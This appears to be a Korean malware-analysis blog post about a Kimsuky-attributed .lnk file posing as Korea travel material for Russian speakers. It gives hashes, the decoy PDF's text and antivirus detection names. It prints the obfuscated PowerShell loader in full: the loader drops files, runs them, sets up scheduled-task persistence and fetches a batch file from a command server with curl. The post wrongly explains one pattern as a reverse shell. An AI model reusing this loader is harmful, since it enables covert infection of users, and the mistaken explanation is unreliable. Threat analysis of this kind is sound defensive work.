한국 관광을 핑계로 러시아 인들을 타겟을 하고 추정 되는 김수키(Kimsuky)만든 악성코드-241007.lnk(2024.10.14)

오늘은 오늘도 대한민국 안보를 열심히 위협하는 해킹 단체인 김수키(Kimsuky)에서 러시아인들에게 한국 전통시장,경북 군,청성등을 소개하는 것 같은데 아무튼 해당 악성코드는 러시아인을 대상으로 타겟으로 추정이 되는 악성코드 입니다.
일단 해당 악성코드 해쉬값은 다음과 같습니다.
파일명: 241007.lnk
사이즈:46.8 MB
MD5:7eb7d0133965022ad362132782da9d15
SHA-1:564b9c9dac942c1284ab565607997b796e28b80c
SHA-256:2a9524821533e3285e9271706c67302e6a0fa8eca79090ba980ad9d8d299c8ea
그리고 악성코드에 포함된 PowerShell 코드는 다음과 같습니다.

악성코드 에 포함된 파워셀 코드

StringData
{
 namestring: 
 relativepath: not present
 workingdir: not present
commandlinearguments: /k for /f "toke(n)s=*" %a i(n) ('dir C:\Windows\SysWow64\
WindowsPow(e)rShell\v1.0\*rshell(.)exe /s /b /od') do call %a "$xtTGE = Get-Loc
atio(n);if($xtTGE -Match 'Sy(s)tem32' -or $xtT(G)E -Match 'Program Files') {$xt
TGE = '%t(e)mp%'};$pz5FU74(r)Lj=@('(.)lnk');$hkJ(9)aVpxO2V7gi = Get-ChildItem -
Pa(t)h $xtTGE -Recu(r)se *.* -File | where {$_.ext(e)nsion -in $pz5FU7(4)rLj} 
| where-(o)bject {$_.length -eq 0x(0)2EE6666} | Select(-)Object -Exp(a)ndPrope
rty FullName;$hCJgBhK9jtWsC = New-Object System.(I)O.FileStream($hkJ9aVpxO2V7g
i, [System.IO.FileMode]::Open, [System.IO(.)FileAccess]::Read);$h(C)JgBhK9jtW
sC.Seek(0x00001742, [System.IO(.)SeekOrig(i)n]::Begin);$Q(f)ljwCakcmCVy1 = New-O
bject byte[] 0x0003A77A(;)$hCJ(g)BhK9jtWsC.Read($Qflj(w)CakcmCVy1, 0, 0x(0)003A7
7A);$Kok(f)X0wnDm = $hkJ9aVpxO2(V)7gi.replace('.lnk','(.)pdf');sc $Kokf(X)0wnDm 
$QfljwCa(k)cmCVy1 -Encoding Byte;& $KokfX0wnDm(;)$hCJgBhK9jtW(s)C.Seek(0x0003B(E
)BC, [System.IO.S(e)ekOrigin]::Begin);$(u)f6YU1v4N=N(e)w-Object byte[] 0x0000(0)
E9B;$hCJgBhK9jtWsC.Read($uf6YU1v4N, 0, 0x0000(0)E9B);$hCJgBhK9jtWsC.Close();$F61
heDpmAIoK=$env(:)public+'\Libraries\winboot(.)b'+'a' +'t';$g(N)49UVvZbCvzq='cmd 
/q /c \\\"start \\\"Not(e)PadPlus\\\" /min \\\"' + $F61heD(p)mAIoK + '\\\" '+[ch
ar][in(t)]::Parse(38, 'Number')+[(c)har][int]::Parse(38, 'Number')+' exit\\\"';s
chta(s)ks /create /sc minute /mo 6 /tn 'Notepad(P)lusAutoUpdate' /tr $gN49UV(v)Z
bCvzq /f;sc $F61h(e)DpmAIoK $u(f)6YU1v4N -E(n)coding Byte;&$F61heDpmAIoK;"&& exit
 iconlocation: (.)pdf
}

코드 설명

1.첫 번째 명령어: Reverse Shell 찾기
해당 명령어는 Windows PowerShell 디렉토리 (C:\Windows\SysWow64\WindowsPowerShell\v1.0) 아래에서 rshell(.)exe 파일을 찾는 동작을 수행 
Reverse Shell은 원격에서 공격자가 시스템을 제어할 수 있게 하려고 사용
dir 명령어는 하위 디렉터리(/s)에서 rshell(.)exe 파일을 가장 최근 수정된 순서로 (/od) 목록을 출력 해당 파일을 실행(call %a)
Reverse Shell을 찾아 실행하는 동작은 공격자가 시스템에 원격 접근할 수 있는 루트를 확보
2. 현재 작업 디렉토리 확인 및 임시 폴더로 이동
Get-Location:현재 스크립트가 실행되는 위치를 확인
System32 또는 Program Files 디렉터리에서 실행 중일 경우 임시 폴더(%temp%)로 이동
System 32와 Program Files는 Windows의 중요한 시스템 디렉토리
따라서 스크립트는 임시 디렉토리로 이동하여 악성 활동을 숨기려는 시도 탐지 회피
3. lnk 파일 탐지 및 변조
.lnk 파일 (Windows 바로가기 파일)을 탐지하여 특정 크기 (0x02EE6666,약 49MB)에 해당하는 파일을 선택
선택된 .lnk 파일들의 전체 경로를 $hkJ9aVpxO2V7gi 변수에 저장.
.lnk 파일 조작: 악성코드가 이를 이용해 실제 악성코드를 실행하거나 사용자가 악성 파일을 실행하도록 유도
4. 파일 스트림을 통해. lnk 파일 내용 읽기 및 변조
FileStream 을 이용해 .lnk 파일을 읽기 모드 로 열고 특정 위치(0x00001742)에서 데이터를 읽음
0x0003A77A (약 239KB)의 데이터를 파일에서 읽어 $QfljwCakcmCVy1 변수에 저장
해당 부분은 .lnk 파일의 내용을 읽어들여 다른 파일로 변환하거나 악성코드가 포함된 데이터를 삽입
파일 내 특정 바이트 위치에서 데이터를 읽는 것은 흔히 악성코드가 특정 데이터(페이로드)를 삽입하거나 추출하는 기법
5.lnk 파일을 PDF 파일로 변환
.lnk 파일을 .pdf 확장자로 변환하고 앞에서 읽어들인 데이터를 바이너리 형식으로 변환하여 PDF 파일에 기록
PDF 파일을 실행
6. 추가 데이터 읽기 및 실행
파일의 다른 부분(0x0003BEBC)에서 추가적인 데이터를 읽음
읽은 데이터를 바이너리 형식으로 $uf6YU1v4N 변수에 저장
7.윈도우 스케줄 작업 생성
윈도우 스케줄 작업을 생성하여 6분마다 winboot(.)bat 파일을 실행하도록 설정
해당 작업은 NotepadPlusAutoUpdate 라는 이름으로 생성

악성코드 실행시 생성되는 PDF 파일

PDF 내용

Место, которое я советую посетить.
София
Я хочу вам посоветовать посетить традиционный корейский рынок. В Сеуле есть четыре главных
рынка. Эти рынки очень старые и имеют длинную историю. Эти рынки находятся рядом с дворцом
Кёнбуккун. Эти рынки существуют со времен Чхосон. Это рынки Намдемун и Дондемун, которые
самые известные. Но мне лично нравится рынок Кванчжан. Там есть много вкусной еды,
например ттокпокки, блинчики из машевой муки ноктучжон и юкхве. Там еще продают
маяккимпаб. Маяк по-корейски значит наркотик, поэтому этот кимпаб очень вкусный, который
вызывает зависимость. На втором этаже рынка есть магазины с одеждой. Там много винтажной
одежды, которая не очень дорогая, разнообразная и необычная. Раньше я часто покупала там
одежду.
Я бы порекомендовала вам поехать в путешествие в Узбекистан, но не летом, а осенью. Осенью
тепло, но уже не жарко, есть очень много вкусных фруктов. Узбекская еда очень вкусная, правда
немного жирная для корейцев. Поэтому нужно пить много чая. Там есть красивые города,
которые можно посетить. Это Самарканд, Бухара и Хива. Цены не очень высокие и многие
местные люди хорошо говорят по-корейски. Потому что многие жили и работали в Корее.
Поэтому, если вы поедете путешествовать в Узбекистан, думаю вам понравится. Я тоже хочу как-
нибудь поехать в Узбекистан путешествовать, но не семьей, а с подругами. Потому что мой муж и
мои дети не очень любят жирную пищу и им скорее всего не понравится, а я хочу много кушать.
Даниил
Я хочу посоветовать вам посетить в Корее район Чонгро. Потому что этот район современный, но в
то же время и традиционный. Туристы могут обойти район пешком и увидеть современную и
традиционную Корею. Чтобы увидеть традиционную Корею, нужно отправиться в северную
часть, а южная часть - это район Ыльчжиро. Он считается настоящим центром современной Кореи.
Самое важное, что тут сконцентрировано большое количество вкусных ресторанов и кафе.
Какое кафе или ресторан вы посоветуете посетить?
Там есть ресторан Доми и ресторан Амсо Соул. Если вы не найдете, можно пойти в ресторан
внутри отеля. Мой метод поиска хорошего ресторана - это ходить в ресторана с отметкой больше
4 и 5 звезд в Какаомэп. Этот метод никогда меня не подводил.
камень, ножницы, бумага
Свободная тема
레전드 러시아어 - 32-35 стр
해당 러시아 번역
꼭 가보시길 추천하는 곳입니다.
소피아
한국 전통시장에 꼭 가보라고 권하고 싶습니다. 서울에는 4가지 주요
시장. 이 시장은 매우 오래되었고 오랜 역사를 가지고 있습니다. 이 시장은 궁전 근처에 있습니다.
경복궁. 이러한 시장은 조선 시대부터 존재해 왔습니다. 남대문시장과 동대문시장이 그것이다.
가장 유명한. 하지만, 저는 개인적으로 광장시장을 좋아해요. 거기엔 맛있는 음식도 많고,
떡볶이, 녹두전, 육화 녹두전 등. 아직도 거기에서 파는군요.
등대김밥. 비콘은 한국어로 마약이라는 뜻인데 이 김밥은 정말 맛있어요.
중독을 유발합니다. 시장 2층에는 옷가게가 있어요. 빈티지한 것들이 많이 있어요.
그다지 비싸지 않고 다양하며 특이한 옷. 나는 그곳에서 자주 쇼핑하곤 했어요.
옷.
우즈베키스탄 여행은 여름이 아닌 가을에 가보시길 추천 드립니다. 가을에
따뜻하지만 뜨겁지 않고 맛있는 과일이 많아요. 우즈벡 음식은 정말 맛있어요.
한국인에게는 조금 기름진 것 같습니다. 그러므로 차를 많이 마셔야 합니다. 거기엔 아름다운 도시들이 있어.
방문할 수 있는 곳. 이들은 사마르칸트, 부하라, 히바이다. 가격도 그리 높지 않고 양도 많아요.
현지 사람들이 한국어를 잘해요. 왜냐하면, 많은 사람이 한국에서 살고 일했기 때문입니다.
그래서 우즈베키스탄 여행 가시면 좋아하실 것 같아요. 나도 방법을 원해-
우즈베키스탄에 여행을 가고 싶지만, 가족이 아닌 친구들과 함께 가고 싶습니다. 왜냐하면, 남편과
우리 아이들은 기름진 음식을 별로 안 좋아하고 아마 안 좋아할 텐데, 저는 많이 먹고 싶어요.
다니엘
한국의 종로 지역을 방문해 보시길 권하고 싶습니다. 이 지역은 현대적이기 때문에
동시에 전통적이다. 관광객들은 도보로 지역을 탐험하고 현대적이고
한국의 전통. 한국의 전통을 보려면 북쪽으로 가야 한다.
일부는 을지로지역이고 남쪽은 을지로지역이다. 현대 한국의 진정한 중심지로 간주합니다.
가장 중요한 것은 여기에 맛있는 레스토랑과 카페가 많이 모여 있다는 것입니다.
어떤 카페나 레스토랑을 방문하길 추천하시나요?
도미 레스토랑과 암소 소울 레스토랑이 있습니다. 못 찾으면 식당에 가도 돼요
호텔 내부. 내가 좋은 식당을 찾는 방법은 눈에 띄는 레스토랑을 찾는 것이다.
카카오메프에서는 별 4개와 5개가 있습니다. 이 방법은 한 번도 실패한 적이 없습니다.
바위, 가위, 종이
무료 테마
전설 러시아어 - 32-35페이지
내용을 보면 러시아 어 교육 관련 부분에 가져온 것 같기도 하고 아무튼 이렇게 PDF 파일이 생성되고 winboot.bat 가 생성됩니다.

winboot.bat 내용

echo off
Set ABP(wp)ekYmDLG=trCwle(U)qadunyRm4EPcobpk2i3f0shvMNxTAO
....

이걸 파이선으로 정리해보면 다음과 같은 코드를 불 수가 있습니다.
echo off
power(s)hell -windowstyle
hidden
그냥 이걸 실행을 하면 다음과 같이 됩니다.
C:\Windows\system32\curl(.)exe
curl  "hxxps://contactcenter(.)mobilo(.)mx/vicidial/ploticus/mobile(.)php?choko=GYHASOLS" -o "reboot234(.)bat"

코드 설명

curl:해당 명령어는 URL에 요청을 보내고 데이터를 다운로드하는 도구
일반적으로 HTTP(S) 요청을 통해 웹 페이지나 파일을 가져오는 데 사용
"hxxps://contactcenter(.)mobilo(.)mx/vicidial/ploticus/mobile(.)php?choko=GYHASOLS"
해당 부분은 요청을 보낼 URL
mobile(.)php라는 PHP 스크립트가 있는 서버의 경로
?choko=GYHASOLS는 쿼리 문자열로 서버에 추가적인 정보를 전달하는 데 사용 해당 경우 choko라는 매개변수에 GYHASOLS라는 값이 할당
-o "reboot234(.)bat":
-o 플래그는 다운로드한 파일을 지정한 이름으로 저장하는 데 사용
reboot234(.)bat는 다운로드한 파일이 저장될 로컬 파일 이름 여기서는 배치 파일 형식(.bat)으로 저장
2024-10-15 04:35:07 UTC 기준 탐지하는 보안 업체들은 다음과 같습니다.
AliCloud:Trojan:Multi/BZC.YMF
ALYac:Trojan.Agent.LNK.Gen
Arcabit:Heur.BZC.YAX.Pantera.190.4BE9B82A
Avast:LNK:Agent-HN [Trj]
AVG:LNK:Agent-HN [Trj]
BitDefender:Heur.BZC.YAX.Pantera.190.4BE9B82A
CTX:Lnk.trojan.multi
Emsisoft:Heur.BZC.YAX.Pantera.190.4BE9B82A (B)
ESET-NOD32:A Variant Of Generik.GSFOQIO
GData:Win32.Malware.LnkCreatesSchtask.A
Google:Detected
Ikarus:Trojan.SuspectCRC
Kaspersky:HEUR:Trojan.Multi.Agent.gen
Lionic:Trojan.WinLNK.Pantera.4!c
Rising:Trojan.Agent/LNK!1.AA03 (CLASSIC)
SentinelOne (Static ML):Static AI - Suspicious LNK
Skyhigh (SWG):BehavesLike.Dropper.vx
Sophos:Troj/LnkObf-AH
Symantec:Scr.Mallnk!gen13
Trellix (HX):Heur.BZC.YAX.Pantera.190.4BE9B82A
Varist:LNK/ABTrojan.DOXC-:
VBA32:Trojan.Link.Crafted
VIPRE:Heur.BZC.YAX.Pantera.190.4BE9B82A
ZoneAlarm by Check Point:HEUR:Trojan.Multi.Agent.gen
일단 악용을 한다고 하면 한국인에게 여행 상품 등을 위장해서 공격하는 방법도 있을 것입니다. 아무튼, 조심하세요.